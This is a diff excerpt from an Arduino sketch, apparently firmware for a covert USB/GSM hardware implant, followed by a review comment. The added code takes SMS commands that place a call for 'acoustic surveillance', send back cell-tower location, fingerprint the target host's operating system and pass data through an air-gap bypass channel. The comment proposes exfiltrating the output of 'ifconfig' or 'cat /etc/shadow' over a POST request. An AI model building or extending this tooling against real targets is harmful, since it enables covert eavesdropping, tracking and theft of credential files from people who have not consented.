WHID_Elite_HybridCC_v.1.0/WHID_Elite_HybridCC_v.1.0.ino

```diff
@@ -0,0 +1,463 @@
+        //#########################################################
+        else if (strncmp(smsBuffer, "spy:", 4) == 0) {
+          delay(1000);
+          
+          if (!fona.callPhone((smsBuffer + 4))) {
+            Serial.println(F("Call Failed"));
+          } else {
+            Serial.println(F("### STARTING ACOUSTIC SURVEILLANCE ###"));
+            delay(1000);
+          }
+        }
+        
+        //####### getlocation: ########################################################
+        //# It queries the BTS/BSC for the CellTower coordinates and send back to you!
+        //#############################################################################
+        else if (strncmp(smsBuffer, "getlocation:", 12) == 0) {
+          //enable GPRS
+          if (!fona.enableGPRS(true))
+            Serial.println(F("Failed to turn on GPRS"));
+          //Get GPS coordinates
+          char replybuffer[50];
+          uint16_t returncode;
+          delay(1500);
+          if (!fona.getGSMLoc(&returncode, replybuffer, 50))
+            Serial.println(F("Failed!"));
+          if (returncode == 0) {
+            Serial.println(replybuffer);
+          }
+          else {
+            Serial.print(F("Fail code #"));
+            Serial.println(returncode);
+          }
+          delay(1500);
+          //disable GPRS
+          if (!fona.enableGPRS(false))
+            Serial.println(F("Failed to turn off GPRS"));
+          //send SMS
+          delay(1500);
+          fona.sendSMS(callerIDbuffer, replybuffer);
+        }
+        
+        //####### enumos: ##########
+        //# Enumerate Target's OS
+        //##########################
+        else if (strncmp(smsBuffer, "enumos:", 7) == 0) {
+          delay(500);
+          String os;
+          FingerprintUSBHost.guessHostOS(os);
+          char opsys[os.length() + 1];
+          os.toCharArray(opsys, os.length() + 1);
+          delay(200);
+          fona.sendSMS(callerIDbuffer, opsys);
+        }
+        //####### batt: ############
+        //# Get Battery Percentage
+        //##########################
+        else if (strncmp(smsBuffer, "batt:", 5) == 0) {
+          uint16_t vbat;   
+          delay(500);
+          //fona.getBattVoltage(&vbat);
+          fona.getBattPercent(&vbat);
+          uint8_t tbat = (uint8_t)vbat;
+          String batt = String(tbat);
+          char battZ[batt.length() + 1];
+          batt.toCharArray(battZ, batt.length() + 1);
+          fona.sendSMS(callerIDbuffer, battZ);
+          Serial.print(F("Batt % = "));
+          Serial.println(battZ);     
+         }
+        else {
+          if(dontSMS != 1)
+            //dontSMS=2;
+          Serial.println(F("No reply!"));
+        }
+      }
+    
+      String cmd = Serial.readStringUntil(':');
+      
+      if (dontGPRS == 1 && cmd == "BAG") {
+        String BypassAirGap = Serial.readString();
+        BypassAirGap.toCharArray(gprsAirgap, 50);
```

Comment:
Have you tried with bigger Array Size? Example: 5000
Wonder if you can successfully exfiltrate bigger data in one POST request.
Example:  Can you try exfiltrate: ifconfig or cat /etc/shadow ?